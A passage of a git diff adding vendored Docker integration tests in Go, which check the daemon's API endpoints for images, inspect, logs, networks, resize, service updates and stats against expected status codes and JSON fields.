{ + testRequires(c, Network) + } + name := "test-api-images-delete" + out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + dockerCmd(c, "tag", name, "test:tag1") + + status, _, err := sockRequest("DELETE", "/images/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict) + + status, _, err = sockRequest("DELETE", "/images/test:noexist", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) //Status Codes:404 – no such image + + status, _, err = sockRequest("DELETE", "/images/test:tag1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) +} + +func (s *DockerSuite) TestAPIImagesHistory(c *check.C) { + if daemonPlatform != "windows" { + testRequires(c, Network) + } + name := "test-api-images-history" + out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) + c.Assert(err, checker.IsNil) + + id := strings.TrimSpace(out) + + status, body, err := sockRequest("GET", "/images/"+id+"/history", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var historydata []types.ImageHistory + err = json.Unmarshal(body, &historydata) + c.Assert(err, checker.IsNil, check.Commentf("Error on unmarshal")) + + c.Assert(historydata, checker.Not(checker.HasLen), 0) + c.Assert(historydata[0].Tags[0], checker.Equals, "test-api-images-history:latest") +} + +// #14846 +func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) { + testRequires(c, Network) + + res, b, err := sockRequestRaw("GET", "/images/search?term=test", nil, "application/json") + c.Assert(err, check.IsNil) + b.Close() + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + c.Assert(res.Header.Get("Content-Type"), checker.Equals, "application/json") +} + +// Test case for 30027: image size reported as -1 in v1.12 client against v1.13 daemon. +// This test checks to make sure both v1.12 and v1.13 client against v1.13 daemon get correct `Size` after the fix. +func (s *DockerSuite) TestAPIImagesSizeCompatibility(c *check.C) { + status, b, err := sockRequest("GET", "/images/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + var images []types.ImageSummary + err = json.Unmarshal(b, &images) + c.Assert(err, checker.IsNil) + c.Assert(len(images), checker.Not(checker.Equals), 0) + for _, image := range images { + c.Assert(image.Size, checker.Not(checker.Equals), int64(-1)) + } + + type v124Image struct { + ID string `json:"Id"` + ParentID string `json:"ParentId"` + RepoTags []string + RepoDigests []string + Created int64 + Size int64 + VirtualSize int64 + Labels map[string]string + } + status, b, err = sockRequest("GET", "/v1.24/images/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + var v124Images []v124Image + err = json.Unmarshal(b, &v124Images) + c.Assert(err, checker.IsNil) + c.Assert(len(v124Images), checker.Not(checker.Equals), 0) + for _, image := range v124Images { + c.Assert(image.Size, checker.Not(checker.Equals), int64(-1)) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go new file mode 100644 index 0000000000..1556099734 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go @@ -0,0 +1,53 @@ +package main + +import ( + "net/http" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInfoAPI(c *check.C) { + endpoint := "/info" + + status, body, err := sockRequest("GET", endpoint, nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + // always shown fields + stringsToCheck := []string{ + "ID", + "Containers", + "ContainersRunning", + "ContainersPaused", + "ContainersStopped", + "Images", + "LoggingDriver", + "OperatingSystem", + "NCPU", + "OSType", + "Architecture", + "MemTotal", + "KernelVersion", + "Driver", + "ServerVersion", + "SecurityOptions"} + + out := string(body) + for _, linePrefix := range stringsToCheck { + c.Assert(out, checker.Contains, linePrefix) + } +} + +func (s *DockerSuite) TestInfoAPIVersioned(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + endpoint := "/v1.20/info" + + status, body, err := sockRequest("GET", endpoint, nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + out := string(body) + c.Assert(out, checker.Contains, "ExecutionDriver") + c.Assert(out, checker.Contains, "not supported") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go new file mode 100644 index 0000000000..546b224c92 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go @@ -0,0 +1,183 @@ +package main + +import ( + "encoding/json" + "net/http" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + keysBase := []string{"Id", "State", "Created", "Path", "Args", "Config", "Image", "NetworkSettings", + "ResolvConfPath", "HostnamePath", "HostsPath", "LogPath", "Name", "Driver", "MountLabel", "ProcessLabel", "GraphDriver"} + + type acase struct { + version string + keys []string + } + + var cases []acase + + if daemonPlatform == "windows" { + cases = []acase{ + {"v1.25", append(keysBase, "Mounts")}, + } + + } else { + cases = []acase{ + {"v1.20", append(keysBase, "Mounts")}, + {"v1.19", append(keysBase, "Volumes", "VolumesRW")}, + } + } + + for _, cs := range cases { + body := getInspectBody(c, cs.version, cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", cs.version)) + + for _, key := range cs.keys { + _, ok := inspectJSON[key] + c.Check(ok, checker.True, check.Commentf("%s does not exist in response for version %s", key, cs.version)) + } + + //Issue #6830: type not properly converted to JSON/back + _, ok := inspectJSON["Path"].(bool) + c.Assert(ok, checker.False, check.Commentf("Path of `true` should not be converted to boolean `true` via JSON marshalling")) + } +} + +func (s *DockerSuite) TestInspectAPIContainerVolumeDriverLegacy(c *check.C) { + // No legacy implications for Windows + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + cases := []string{"v1.19", "v1.20"} + for _, version := range cases { + body := getInspectBody(c, version, cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", version)) + + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + _, ok = cfg["VolumeDriver"] + c.Assert(ok, checker.True, check.Commentf("API version %s expected to include VolumeDriver in 'Config'", version)) + } +} + +func (s *DockerSuite) TestInspectAPIContainerVolumeDriver(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--volume-driver", "local", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + body := getInspectBody(c, "v1.25", cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version 1.25")) + + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + _, ok = cfg["VolumeDriver"] + c.Assert(ok, checker.False, check.Commentf("API version 1.25 expected to not include VolumeDriver in 'Config'")) + + config, ok = inspectJSON["HostConfig"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'HostConfig'")) + cfg = config.(map[string]interface{}) + _, ok = cfg["VolumeDriver"] + c.Assert(ok, checker.True, check.Commentf("API version 1.25 expected to include VolumeDriver in 'HostConfig'")) +} + +func (s *DockerSuite) TestInspectAPIImageResponse(c *check.C) { + dockerCmd(c, "tag", "busybox:latest", "busybox:mytag") + + endpoint := "/images/busybox/json" + status, body, err := sockRequest("GET", endpoint, nil) + + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var imageJSON types.ImageInspect + err = json.Unmarshal(body, &imageJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for latest version")) + c.Assert(imageJSON.RepoTags, checker.HasLen, 2) + + c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:latest"), checker.Equals, true) + c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:mytag"), checker.Equals, true) +} + +// #17131, #17139, #17173 +func (s *DockerSuite) TestInspectAPIEmptyFieldsInConfigPre121(c *check.C) { + // Not relevant on Windows + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + cases := []string{"v1.19", "v1.20"} + for _, version := range cases { + body := getInspectBody(c, version, cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", version)) + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + for _, f := range []string{"MacAddress", "NetworkDisabled", "ExposedPorts"} { + _, ok := cfg[f] + c.Check(ok, checker.True, check.Commentf("API version %s expected to include %s in 'Config'", version, f)) + } + } +} + +func (s *DockerSuite) TestInspectAPIBridgeNetworkSettings120(c *check.C) { + // Not relevant on Windows, and besides it doesn't have any bridge network settings + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + containerID := strings.TrimSpace(out) + waitRun(containerID) + + body := getInspectBody(c, "v1.20", containerID) + + var inspectJSON v1p20.ContainerJSON + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil) + + settings := inspectJSON.NetworkSettings + c.Assert(settings.IPAddress, checker.Not(checker.HasLen), 0) +} + +func (s *DockerSuite) TestInspectAPIBridgeNetworkSettings121(c *check.C) { + // Windows doesn't have any bridge network settings + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + containerID := strings.TrimSpace(out) + waitRun(containerID) + + body := getInspectBody(c, "v1.21", containerID) + + var inspectJSON types.ContainerJSON + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil) + + settings := inspectJSON.NetworkSettings + c.Assert(settings.IPAddress, checker.Not(checker.HasLen), 0) + c.Assert(settings.Networks["bridge"], checker.Not(checker.IsNil)) + c.Assert(settings.IPAddress, checker.Equals, settings.Networks["bridge"].IPAddress) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go new file mode 100644 index 0000000000..f49a139c28 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go @@ -0,0 +1,35 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "net/http" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// #16665 +func (s *DockerSuite) TestInspectAPICpusetInConfigPre120(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, cgroupCpuset) + + name := "cpusetinconfig-pre120" + dockerCmd(c, "run", "--name", name, "--cpuset-cpus", "0", "busybox", "true") + + status, body, err := sockRequest("GET", fmt.Sprintf("/v1.19/containers/%s/json", name), nil) + c.Assert(status, check.Equals, http.StatusOK) + c.Assert(err, check.IsNil) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal body for version 1.19")) + + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + _, ok = cfg["Cpuset"] + c.Assert(ok, checker.True, check.Commentf("API version 1.19 expected to include Cpuset in 'Config'")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go new file mode 100644 index 0000000000..2e8ffa9bdc --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go @@ -0,0 +1,87 @@ +package main + +import ( + "bufio" + "bytes" + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 1; done") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + type logOut struct { + out string + res *http.Response + err error + } + chLog := make(chan logOut) + + go func() { + res, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1×tamps=1", id), nil, "") + if err != nil { + chLog <- logOut{"", nil, err} + return + } + defer body.Close() + out, err := bufio.NewReader(body).ReadString('\n') + if err != nil { + chLog <- logOut{"", nil, err} + return + } + chLog <- logOut{strings.TrimSpace(out), res, err} + }() + + select { + case l := <-chLog: + c.Assert(l.err, checker.IsNil) + c.Assert(l.res.StatusCode, checker.Equals, http.StatusOK) + if !strings.HasSuffix(l.out, "hello") { + c.Fatalf("expected log output to container 'hello', but it does not") + } + case <-time.After(20 * time.Second): + c.Fatal("timeout waiting for logs to exit") + } +} + +func (s *DockerSuite) TestLogsAPINoStdoutNorStderr(c *check.C) { + name := "logs_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + status, body, err := sockRequest("GET", fmt.Sprintf("/containers/%s/logs", name), nil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + c.Assert(err, checker.IsNil) + + expected := "Bad parameters: you must choose at least one stream" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) +} + +// Regression test for #12704 +func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) { + name := "logs_test" + t0 := time.Now() + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "sleep", "10") + + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + t1 := time.Now() + c.Assert(err, checker.IsNil) + body.Close() + elapsed := t1.Sub(t0).Seconds() + if elapsed > 20.0 { + c.Fatalf("HTTP response was not immediate (elapsed %.1fs)", elapsed) + } +} + +func (s *DockerSuite) TestLogsAPIContainerNotFound(c *check.C) { + name := "nonExistentContainer" + resp, _, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go new file mode 100644 index 0000000000..1cc66f0900 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go @@ -0,0 +1,353 @@ +package main + +import ( + "encoding/json" + "fmt" + "net" + "net/http" + "net/url" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPINetworkGetDefaults(c *check.C) { + testRequires(c, DaemonIsLinux) + // By default docker daemon creates 3 networks. check if they are present + defaults := []string{"bridge", "host", "none"} + for _, nn := range defaults { + c.Assert(isNetworkAvailable(c, nn), checker.Equals, true) + } +} + +func (s *DockerSuite) TestAPINetworkCreateDelete(c *check.C) { + testRequires(c, DaemonIsLinux) + // Create a network + name := "testnetwork" + config := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: true, + }, + } + id := createNetwork(c, config, true) + c.Assert(isNetworkAvailable(c, name), checker.Equals, true) + + // delete the network and make sure it is deleted + deleteNetwork(c, id, true) + c.Assert(isNetworkAvailable(c, name), checker.Equals, false) +} + +func (s *DockerSuite) TestAPINetworkCreateCheckDuplicate(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testcheckduplicate" + configOnCheck := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: true, + }, + } + configNotCheck := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: false, + }, + } + + // Creating a new network first + createNetwork(c, configOnCheck, true) + c.Assert(isNetworkAvailable(c, name), checker.Equals, true) + + // Creating another network with same name and CheckDuplicate must fail + createNetwork(c, configOnCheck, false) + + // Creating another network with same name and not CheckDuplicate must succeed + createNetwork(c, configNotCheck, true) +} + +func (s *DockerSuite) TestAPINetworkFilter(c *check.C) { + testRequires(c, DaemonIsLinux) + nr := getNetworkResource(c, getNetworkIDByName(c, "bridge")) + c.Assert(nr.Name, checker.Equals, "bridge") +} + +func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { + testRequires(c, DaemonIsLinux) + // Inspect default bridge network + nr := getNetworkResource(c, "bridge") + c.Assert(nr.Name, checker.Equals, "bridge") + + // run a container and attach it to the default bridge network + out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + containerID := strings.TrimSpace(out) + containerIP := findContainerIP(c, "test", "bridge") + + // inspect default bridge network again and make sure the container is connected + nr = getNetworkResource(c, nr.ID) + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.Containers), checker.Equals, 1) + c.Assert(nr.Containers[containerID], checker.NotNil) + + ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) + c.Assert(err, checker.IsNil) + c.Assert(ip.String(), checker.Equals, containerIP) + + // IPAM configuration inspect + ipam := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "172.28.0.0/16", IPRange: "172.28.5.0/24", Gateway: "172.28.5.254"}}, + } + config := types.NetworkCreateRequest{ + Name: "br0", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam, + Options: map[string]string{"foo": "bar", "opts": "dopts"}, + }, + } + id0 := createNetwork(c, config, true) + c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, true) + + nr = getNetworkResource(c, id0) + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16") + c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24") + c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254") + c.Assert(nr.Options["foo"], checker.Equals, "bar") + c.Assert(nr.Options["opts"], checker.Equals, "dopts") + + // delete the network and make sure it is deleted + deleteNetwork(c, id0, true) + c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, false) +} + +func (s *DockerSuite) TestAPINetworkConnectDisconnect(c *check.C) { + testRequires(c, DaemonIsLinux) + // Create test network + name := "testnetwork" + config := types.NetworkCreateRequest{ + Name: name, + } + id := createNetwork(c, config, true) + nr := getNetworkResource(c, id) + c.Assert(nr.Name, checker.Equals, name) + c.Assert(nr.ID, checker.Equals, id) + c.Assert(len(nr.Containers), checker.Equals, 0) + + // run a container + out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + containerID := strings.TrimSpace(out) + + // connect the container to the test network + connectNetwork(c, nr.ID, containerID) + + // inspect the network to make sure container is connected + nr = getNetworkResource(c, nr.ID) + c.Assert(len(nr.Containers), checker.Equals, 1) + c.Assert(nr.Containers[containerID], checker.NotNil) + + // check if container IP matches network inspect + ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) + c.Assert(err, checker.IsNil) + containerIP := findContainerIP(c, "test", "testnetwork") + c.Assert(ip.String(), checker.Equals, containerIP) + + // disconnect container from the network + disconnectNetwork(c, nr.ID, containerID) + nr = getNetworkResource(c, nr.ID) + c.Assert(nr.Name, checker.Equals, name) + c.Assert(len(nr.Containers), checker.Equals, 0) + + // delete the network + deleteNetwork(c, nr.ID, true) +} + +func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { + testRequires(c, DaemonIsLinux) + // test0 bridge network + ipam0 := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "192.178.0.0/16", IPRange: "192.178.128.0/17", Gateway: "192.178.138.100"}}, + } + config0 := types.NetworkCreateRequest{ + Name: "test0", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam0, + }, + } + id0 := createNetwork(c, config0, true) + c.Assert(isNetworkAvailable(c, "test0"), checker.Equals, true) + + ipam1 := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "192.178.128.0/17", Gateway: "192.178.128.1"}}, + } + // test1 bridge network overlaps with test0 + config1 := types.NetworkCreateRequest{ + Name: "test1", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam1, + }, + } + createNetwork(c, config1, false) + c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, false) + + ipam2 := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "192.169.0.0/16", Gateway: "192.169.100.100"}}, + } + // test2 bridge network does not overlap + config2 := types.NetworkCreateRequest{ + Name: "test2", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam2, + }, + } + createNetwork(c, config2, true) + c.Assert(isNetworkAvailable(c, "test2"), checker.Equals, true) + + // remove test0 and retry to create test1 + deleteNetwork(c, id0, true) + createNetwork(c, config1, true) + c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, true) + + // for networks w/o ipam specified, docker will choose proper non-overlapping subnets + createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, true) + c.Assert(isNetworkAvailable(c, "test3"), checker.Equals, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, true) + c.Assert(isNetworkAvailable(c, "test4"), checker.Equals, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, true) + c.Assert(isNetworkAvailable(c, "test5"), checker.Equals, true) + + for i := 1; i < 6; i++ { + deleteNetwork(c, fmt.Sprintf("test%d", i), true) + } +} + +func (s *DockerSuite) TestAPICreateDeletePredefinedNetworks(c *check.C) { + testRequires(c, DaemonIsLinux) + createDeletePredefinedNetwork(c, "bridge") + createDeletePredefinedNetwork(c, "none") + createDeletePredefinedNetwork(c, "host") +} + +func createDeletePredefinedNetwork(c *check.C, name string) { + // Create pre-defined network + config := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: true, + }, + } + shouldSucceed := false + createNetwork(c, config, shouldSucceed) + deleteNetwork(c, name, shouldSucceed) +} + +func isNetworkAvailable(c *check.C, name string) bool { + status, body, err := sockRequest("GET", "/networks", nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + nJSON := []types.NetworkResource{} + err = json.Unmarshal(body, &nJSON) + c.Assert(err, checker.IsNil) + + for _, n := range nJSON { + if n.Name == name { + return true + } + } + return false +} + +func getNetworkIDByName(c *check.C, name string) string { + var ( + v = url.Values{} + filterArgs = filters.NewArgs() + ) + filterArgs.Add("name", name) + filterJSON, err := filters.ToParam(filterArgs) + c.Assert(err, checker.IsNil) + v.Set("filters", filterJSON) + + status, body, err := sockRequest("GET", "/networks?"+v.Encode(), nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + nJSON := []types.NetworkResource{} + err = json.Unmarshal(body, &nJSON) + c.Assert(err, checker.IsNil) + c.Assert(len(nJSON), checker.Equals, 1) + + return nJSON[0].ID +} + +func getNetworkResource(c *check.C, id string) *types.NetworkResource { + _, obj, err := sockRequest("GET", "/networks/"+id, nil) + c.Assert(err, checker.IsNil) + + nr := types.NetworkResource{} + err = json.Unmarshal(obj, &nr) + c.Assert(err, checker.IsNil) + + return &nr +} + +func createNetwork(c *check.C, config types.NetworkCreateRequest, shouldSucceed bool) string { + status, resp, err := sockRequest("POST", "/networks/create", config) + if !shouldSucceed { + c.Assert(status, checker.Not(checker.Equals), http.StatusCreated) + return "" + } + + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var nr types.NetworkCreateResponse + err = json.Unmarshal(resp, &nr) + c.Assert(err, checker.IsNil) + + return nr.ID +} + +func connectNetwork(c *check.C, nid, cid string) { + config := types.NetworkConnect{ + Container: cid, + } + + status, _, err := sockRequest("POST", "/networks/"+nid+"/connect", config) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) +} + +func disconnectNetwork(c *check.C, nid, cid string) { + config := types.NetworkConnect{ + Container: cid, + } + + status, _, err := sockRequest("POST", "/networks/"+nid+"/disconnect", config) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) +} + +func deleteNetwork(c *check.C, id string, shouldSucceed bool) { + status, _, err := sockRequest("DELETE", "/networks/"+id, nil) + if !shouldSucceed { + c.Assert(status, checker.Not(checker.Equals), http.StatusOK) + return + } + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(err, checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go new file mode 100644 index 0000000000..daf1b05d2e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "net/http" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestResizeAPIResponse(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" + status, _, err := sockRequest("POST", endpoint, nil) + c.Assert(status, check.Equals, http.StatusOK) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestResizeAPIHeightWidthNoInt(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + endpoint := "/containers/" + cleanedContainerID + "/resize?h=foo&w=bar" + status, _, err := sockRequest("POST", endpoint, nil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestResizeAPIResponseWhenContainerNotStarted(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + cleanedContainerID := strings.TrimSpace(out) + + // make sure the exited container is not running + dockerCmd(c, "wait", cleanedContainerID) + + endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" + status, body, err := sockRequest("POST", endpoint, nil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + c.Assert(err, check.IsNil) + + c.Assert(getErrorMessage(c, body), checker.Contains, "is not running", check.Commentf("resize should fail with message 'Container is not running'")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go new file mode 100644 index 0000000000..15a21e579f --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go @@ -0,0 +1,39 @@ +// +build !windows + +package main + +import ( + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func setPortConfig(portConfig []swarm.PortConfig) serviceConstructor { + return func(s *swarm.Service) { + if s.Spec.EndpointSpec == nil { + s.Spec.EndpointSpec = &swarm.EndpointSpec{} + } + s.Spec.EndpointSpec.Ports = portConfig + } +} + +func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service with a port mapping of 8080:8081. + portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}} + serviceID := d.createService(c, simpleTestService, setInstances(1), setPortConfig(portConfig)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // Update the service: changed the port mapping from 8080:8081 to 8082:8083. + updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}} + remoteService := d.getService(c, serviceID) + d.updateService(c, remoteService, setPortConfig(updatedPortConfig)) + + // Inspect the service and verify port mapping. + updatedService := d.getService(c, serviceID) + c.Assert(updatedService.Spec.EndpointSpec, check.NotNil) + c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083)) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go new file mode 100644 index 0000000000..23fbdbb740 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go @@ -0,0 +1,310 @@ +package main + +import ( + "encoding/json" + "fmt" + "net/http" + "os/exec" + "runtime" + "strconv" + "strings" + "sync" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +var expectedNetworkInterfaceStats = strings.Split("rx_bytes rx_dropped rx_errors rx_packets tx_bytes tx_dropped tx_errors tx_packets", " ") + +func (s *DockerSuite) 